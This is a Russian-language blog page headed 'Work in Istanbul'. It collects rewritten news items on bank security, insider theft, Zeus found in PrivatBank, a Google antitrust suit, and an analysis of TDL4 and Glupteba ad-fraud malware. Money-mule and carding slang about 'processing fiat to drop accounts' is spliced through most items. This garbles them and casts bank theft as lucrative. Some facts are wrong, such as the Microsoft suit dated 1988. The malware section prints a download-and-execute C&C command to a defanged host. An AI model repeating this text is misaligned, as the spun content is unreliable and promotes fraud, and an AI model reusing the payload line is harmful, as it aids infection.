Работа в Стамбуле

Блог

  • 30% сотрудников представляют угрозу банкам в еврозоне

    30% сотрудников представляют угрозу банкам в еврозоне

        Мотовильная компания из Днепропетровска провела исследование с целью определения уровня осведомленности в области информационной безопасности среди сотрудников украинских банков. Результаты исследования позволили выявить низкий уровень знаний респондентов в этой области, несоблюдение простейших правил защиты информации, высокий риск проникновения в банковскую сеть c последующим процессингом фиата на карты и счета неразводдных дропов, утечки конфиденциальных данных и убытков, связанных с этим. Кроме того, каждый пятый респондент признался, что готов за вознаграждение передать третьим лицам конфиденциальную информацию, к которой он имеет доступ, как это недавно сделал Edward Snowden.

    30% банковских клерков еврозоны нелояльны

    Специалистам, отвечающим за информационную безопасность в банках, определенно есть о чем беспокоиться. Степень осведомленности в этой области сотрудников украинских банков оставляет желать много лучшего – половине опрошенных вообще никогда не сообщали о правилах защиты информации. Остальные были ознакомлены с соответствующими требованиями безопасности только однажды ­– при поступлении на работу, и лишь 10 процентов респондентов регулярно проходят инструктаж или оучение по банковской информационной безопасности.

    При этом степень риска достаточно велика: 2 из 3 участников опроса говорят, что посещают потенциально опасные сайты с рабочего компьютера.

    Исследование показало, что большинство пользователей не осознает угрозы проникновения в корпоративные сети через электронную почту: 95% ответивших на вопросы исследования сообщили, что открывают письма от незнакомых отправителей. Также есть риск утечки данных – 60% респондентов пересылают корпоративную информацию на личные почтовые ящики, чтобы поработать с ней из дома.

    Некоторые результаты исследования не самым лучшим образом характеризуют работу не только специалистов по информационной безопасности, но и менеджеров по персоналу: 57% участников опроса рассказали, что используют рабочую почту для ведения личной переписки.

    Зачастую работники не соблюдают и самых элементарных правил безопасности. Так, 25% пользователей никогда не блокируют свой компьютер, покидая рабочее место. Таким образом, каждый четвертый сотрудник оставляет открытым доступ к корпоративной информации кому угодно, в том числе и посторонним людям, которые легко могут подойти и процессить лбые суммы со счетов клиентов банка куда угодно.

    Треть сотрудников хранит пароли на листке бумаги или в файле на рабочем столе своего компьютера. Функцией «Запомнить пароль» пользуются 25% опрошенных. Причем речь идет не только о паролях для почты – в каждом банке есть системы или базы данных, доступ к которым имеет ограниченное количество сотрудников.

    Каждый третий респондент использует один пароль для всех случаев жизни, что может сильно облегчить дроповодам процессинга задачу по проникновению в корпоративную сеть банковского учреждения и процессингу через неё денежных средств в люых количествах.

    Более 60% респондентов не защищают свои смартфоны паролем. Ввиду того, что все больше сотрудников используют мобильные устройства в рабочих целях, смартфоны могут стать ещё одним каналом утечки банковских данных.

    Результаты опроса показывают, что 9 из 10 пользователей не уничтожают носители, содержащие банковскую информацию. При этом бумажные или электронные носители – один из самых распространенных каналов утечки данных. С завидной частотой конфиденциальная информация становится достоянием общественности или дроповодов процессинга после того, как работники отправляют её в мусорное ведро, а в США суды оправдывают компании, извлекающие промышленные секреты из мусора конкурентов: все, что выброшено сотрудниками, признается ненужным организации. На Украине тоже нередки случаи утечки персональных данных и конфиденциальной информации, особенно на бумажных носителях.

    В исследовании приняли участие более 1100 офисных работников 25-50 лет из нескольких сотен украинских банков. Анонимный опрос проводился среди сотрудников, в круг рабочих задач которых не входят вопросы, связанные с информационной безопасностью. Исследование было проведено в сентябре — ноябре прошлого года.

  • Процессинг фиата на карту или счёт неразводного дропа из кафе со счета кредитной организации

    Процессинг фиата на карту или счёт неразводного дропа из кафе со счета кредитной организации

    Нарушитель, который занимался процессингом фиата через сеть интернет со счета кредитной организации с помощью системы дистанционного банковского обслуживания, обнаружен в Москве оперативниками Управления «К» МВД России, его доход за неделю мог составлять около 2 млн рублей.

    процессинг крипты сидя в кафе

    В ходе оперативно-розыскных мероприятий специалисты Управления «К» получили сведения о том, что 23-летний сотрудник одного из крупных банков, используя уязвимости в его IT-инфраструктуре, переводит принадлежащие указанной кредитной организации денежные средства на свой криптовалютный кошелек, покупая на бирже биткойн и USDT.

    Для того, чтобы запутать следы, молодой человек выстроил многоступенчатую схему процессинга фиатных денежных средств с банковских счетов: используя удаленный доступ к системе, он задействовал счёт неразводдного дропа, открытый в том же банке, для процессинга фиата на виртуальный кошелек одной из криптовалютных платежных систем, а впоследствии продавал криптовалюту в сети Интернет и перечислял часть полученных таким образом фиатных денежных средств на счета мобильных телефонов, принадлежащих ему и его родственникам.

    Проработав в должности специалиста банка всего две недели, молодой человек не смог устоять против возможности быстрого обогащения: перестал появляться на работе, а спустя еще пару недель уже являлся обладателем крупной суммы денег, утекший из банка по схеме процессинга.

    Сотрудники Управления «К» установили, что завершив процессинг фиата на банковский счёт своего неразводного дропа и электронные кошельки в USDT и биткойнах, молодой человек уехал в Элисту, поменял паспорт и жил в частном доме своих родственников.

    В ходе проведения обыска по месту жительства дроповода была обнаружена и изъята компьютерная техника, с помощью которой он и совершал процессинг денежных средств из сети банка, а также часть товаров, приобретенных в сети Интернет на деньги, полученные нелегально.

  • В сети ПриватБанка найдены ZeUS и другие банковские боты процессинга фиата

    В сети ПриватБанка найдены ZeUS и другие банковские боты процессинга фиата

    Внедрение Cisco Cyber Threat Defense (CTD) обычно начинается с PoC (Proof of Concept), позволяющего оперативно оценить возможности решения, осуществляющего мониторинг внутренней сети и происходящей в ней активности. 
    Это распространенная практика для решений по мониторингу чего-нибудь — утечек информации (Cisco IronPort Email DLP), электронной почты (E-mail Security Appliance), приложений (Cisco ASA Next-Generation Firewall Services) и т.п. Обычно уже после первой недели мониторинга результат работы этих решений удивляет — специалисты по безопасности узнают немало интересного о своей сети и о действиях пользователей в ней. Спам, вирусы, утечки конфиденциальной информации, внешние IP-адреса во внутренней сети, управляющий трафик ботнетов, банковские трояны, несанкционированно установленные точки беспроводного доступа или Web-серверы… Да мало какие инструменты процессинга фиата через интернет или ещё что можно найти в сети банка, в которой работают продвинутые и не очень пользователи?
    Не так давно один сотрудник российского офиса Cisco разворачивал Cyber Threat Defense в сети ПриватБанка на Украине. С виду ПриватБанк — очень серьезная организация, серьезно относящаяся ко своей информационной безопасности, но как показывает практика последнего времени, целенаправленные атаки (APT), направленные на процессинг фиата, включая процессинг с использованием системы SWIFT и её сообщщений MT103/202, становятся всё активнее и всё опаснее. 


    Число попыток целенаправленно процессинга фиата с банковских счетов легальных холдеров превышает традиционные интернет атаки. Специально разрабатываются методы обхода защиты периметра сети банка, такие как установка дроповодами дополнительного 3G или 4G маршрутизатора прямо в офисе банка, либо точки доступа WiFi в филиале или главном офисе. 
    На сегодняшний день средства защиты корпоративной или ведомственной сети финансового учреждения работают неэффективно, в случае, если попытка процессинга фиата со стороны дроповодов на счета неразводных дропов будет осуществляться из внутренней сети банка, они тут мало чем смогут помочь, не говоря уже о том, чтобы предотвратить перевод денег на счета разводных дропов. 
    Однако, при помощи Cisco Cyber Threat Defense можно отследить подозрительную сетевую активность. Именно это решение спустя всего 7 дней работы со своими базовыми настройками наткнулось на целый букет аномалий в сети ПриватБанка — среди них банковский троян Zeus, несколько других модификаций банковских ботов, управляемых извне, и ряд других таких же «приятных сюрпризов».
    Вот только один скриншот Cisco Cyber Threat Defense. На нем виден очень высокий уровень CI, то есть Concert Index или иными словами индекс подозрительности трафика, который характеризует наличие в сети ПриватБанка признаков киберугроз работы проверенных дроповодов и процессинга фиата на счета неразводных дропов. Вычисляется этот индекс автоматически, по заложенному в Cisco CTD алгоритму, чем выше это значение, тем вероятнее и серьезнее угроза (обратите внимание на показатель в 708 тысяч процентов) — это однозначно характеризует угрозу процессинга фиата из банка на контролируемые дроповодами счета. 
    что нашла Cisco Cyber Threat Defense (CTD) в сети ПриватБанка
    Дополнительный анализ позволяет понять, что это за угроза, её источник и в какой банк будут переводится деньги на счета неразводных дропов. По этому при желании процессинг фиата на счета неразводных дропов вполне можно предотвратить в том случае, если сами сотрудники банка не пожелают заняться подобным столь прибыльным на сегодня бизнесом.
  • Google опять вляпалась в антимонопольный скандал

    Google опять вляпалась в антимонопольный скандал

    Компанию опять обвиняют в нарушении антимонопольного законодательства

    Google опять вляпалась в антимонопольный скандал

    Министерство юстиции США вместе с генеральными прокурорами 11 штатов подало коллективный антимонопольный иск против компании Google, обвинив технологического гиганта в поддержании незаконной монополии на поиск и поисковую рекламу в Интернете. Причём во всех штатах, которые присоединились к иску, генеральные прокуроры — республиканцы.

    Широко ожидаемый судебный процесс является самым значительным антимонопольным делом с тех пор, как в 1988 году министерство юстиции подало в суд на компанию Microsoft в связи с ее монопольным положением на рынке программного обеспечения.

    Нынешний иск является результатом годичного расследования в отношении Google и трех других технологических гигантов: Apple, Amazon и Facebook. По мнению авторов иска, компания Google пользовалась своим доминирующим положением на рынке для подавления конкуренции, для этого Google использует антиконкурентные соглашения: она платит миллиарды долларов производителям смартфонов, операторам связи и разработчикам, чтобы поисковик компании был предустановлен в устройствах по умолчанию.

    Генеральный прокурор Уильям Барр назвал иск грандиозным делом «как для министерства юстиции, так и для американского народа».

    «Этот иск наносит удар по самим основам контроля Google над Интернетом в интересах миллионов американских потребителей, рекламодателей, малого бизнеса и предпринимателей», – заявил Барр.

    В марте прошлого года Еврокомиссия уже оштрафовала Google почти на 1,5 миллиарда евро за злоупотребление доминирующим положением на рынке рекламы в интернете. Компания вводила договорные ограничения на размещение рекламы компаний-конкурентов на сторонних веб-сайтах, подобные соглашения заключались в индивидуальном порядке, нарушив таким образом антимонопольное законодательство Евросоюза. 

  • Black Hat SEO или бот для скликивания контекстной рекламы

    Black Hat SEO или бот для скликивания контекстной рекламы

    На днях мне стало интересно, а каким образом с точки зрения «черных» методов SEO могут быть использованы хакерские программы – например, путем генерации трафика для заинтересованных ресурсов или скликивания контекстной рекламы AdWords или Яндекс.Директ 
    подмена поисковой выдачи в процессинге

    Понятно, что увеличение числа посетителей на сайте интернет-магазина или компании, занимающейся недвижимостью, вероятнее всего положительно скажется на их доходах. Поэтому разработка подобного типа программ — вполне себе обыденное дело, и появились такие программы уже давно. По большей части таких ботов можно разделить на два класса — это различного рода Adware, которое распространяется вместе с популярными программами, или трояны, которые осуществляют более серьезную модификацию системы. 

    Win32/Patched.P

    Давай для начала рассмотрим достаточно экзотический, но от этого не менее интересный способ подмены результатов поиска в популярных поисковых сервисах Яндекс и Google, который был реализован в троянской программе Win32/Patched.P (ESET). В первый раз я столкнулся с этой вредоносной программой осенью 2008 года, и она привлекла меня тем, что используемый ей алгоритм подмены был хорошо продуманным и более сложным для обнаружения, чем у «конкурентов».
    Win32/Patched.P вносила всего лишь одно изменение в систему: она модифицировала системную библиотеку ws2_32.dll, которая отвечает за реализацию сетевых функций прикладного уровня (например, таких как сокеты) в операционных системах MS Windows. Полезная нагрузка представляла собой кусок ассемблерного кода, который дроппер вставляет в конец оригинальной ws2_32.dll, модифицируя также точку входа, таблицу экспортов, релокации и склеивая все секции в одну для упрощения жизни при вышеописанных модификациях.
    На рисунке 2 представлены интернет-сервисы, к которым этот троянец проявлял особенный интерес путем осуществления перехвата часто используемых для реализации сетевого взаимодействия системных функций, таких как:
    int WSASend(
    __in SOCKET s,
    __in LPWSABUF lpBuffers,
    __in DWORD dwBufferCount,
    __out LPDWORD lpNumberOfBytesSent,
    __in DWORD dwFlags,
    __in LPWSAOVERLAPPED lpOverlapped,
    __in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
    );
    int WSARecv(
    __in SOCKET s,
    __inout LPWSABUF lpBuffers,
    __in DWORD dwBufferCount,
    __out LPDWORD lpNumberOfBytesRecvd,
    __inout LPDWORD lpFlags,
    __in LPWSAOVERLAPPED lpOverlapped,
    __in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
    );
    int send(
    __in SOCKET s,
    __in const char *buf,
    __in int len,
    __in int fl ags
    );
    int recv(
    __in SOCKET s,
    __out char *buf,
    __in int len,
    __in int fl ags
    );
    int select(
    __in int nfds,
    __inout fd_set *readfds,
    __inout fd_set *writefds,
    __inout fd_set *exceptfds,
    __in const struct timeval *timeout
    );
    Перехватывая и контролируя указанные функции Winsock на этом уровне, можно осуществлять подмену любых GET/POST запросов независимо от разработчика браузера или его версии. Да и заметить сходу такую подмену сможет далеко не каждый системный администратор, не говоря уже о большинстве пользователей. На уровне модифицированного кода, на примере функции WSARecv(), это выглядит так.
    Конечно же, весь функционал не ограничивается только подменой результатов поиска. Есть интересные экземпляры ботов, которые осуществляют скликивание рекламы и накрутку контекстных объявлений.

    Сэмпл TDL4 — Win32/Olmarik.AOV

    Вот, к примеру, не так давно нами была замечена интересная особенность в некоторых новых экземплярах руткита TDL4 — Win32/ Olmarik.AOV, о котором я достаточно подробно написал в своей предыдущей статье в январе 2011 года. Но, если кто не в курсе, данному руткиту удается удерживать звание самой технологичной массовой вредоносной программы на протяжении вот уже нескольких лет.
    Это первый полноценный руткит для x64, которому удалось в обход проверки цифровой подписи и PatchGuard пробраться в ядро на 64-битных системах. Но давай вернемся к тому, из-за чего собственно пошел разговор об этом рутките. А дело в том, что после своей собственной успешной установки некоторые экземпляры этого руткита устанавливают в систему еще и троянцев из семейства Win32/Glupteba (ESET). Это наводит на мысли о том, что ресурсы ботнета начали сдавать в аренду. Также интересен тот факт, что дальнейшего взаимодействия между ботами Win32/Glupteba и TDL4 нет.
    Итак, сразу после установки и идентификации бот TDL4 получает из С&C команду:
    task_id = 2|10||hxxp://wheelcars.ru/no.exe
    Интерпретировать которую можно следующим образом:
    task_id = [command_id] [encryption_key] [URL]
    В нашем случае набор параметров совпадает с командой «DownloadAndExecute», поскольку ключ шифрования равен нулю, а идентификатор команды равен двум, и затем следует количество попыток ее выполнения, равное десяти. После установки в систему Win32/Glupteba получает задание уже из своего C&C и начинает его выполнение.
    Чаще всего бот получает два типа заданий — скликивание контекстной рекламы из рекламной сети «Бегун» и рассылку спама. Давай поподробнее рассмотрим, что же делает этот бот.
    В первом случае происходит посещение большого количества сформированных специальным образом веб-страниц, наполнение которых провоцирует появление определенного типа контекстных объявлений. Причем все веб-страницы, с которых происходит скликивание, расположены на серверах провайдера Masterhost. Если посмотреть на статистику сетевых обращений скликивающего бота, то можно заметить большое количество обращений к серверам компании «Бегун». Интерес со стороны Win32/Glupteba к другим сервисам контекстной рекламы замечен не был — возможно, это объясняется тем, что сам алгоритм скликивания контекстной рекламы реализован достаточно примитивно. А в крупных системах, таких как Яндекс.
    алгоритм скликивания контекстной рекламы
    Яндекс.Директ или Google AdWords, реализованы серьезные механизмы защиты от подобного рода мошенничества, которые сильно портят жизнь желающим быстрой наживы за счет вышеописанных способов нечестного продвижения.
    Сам же ботнет TDL4 так же, как и его предшественник предыдущей версии, активно монетизируется через «черные» методы продвижения веб-сайтов и подмену результатов поиска в популярных поисковых системах. Только он реализует гораздо более серьезные методы, используя способ скрытого запуска браузера Microsoft Internet Explorer через вызов ActiveX-компонента WebBrowser и эмуляции работы пользователя (при посещении веб-страницы меняется положение курсора). Кроме того, в нем реализован обход прочих превентивных методов обнаружения ботов.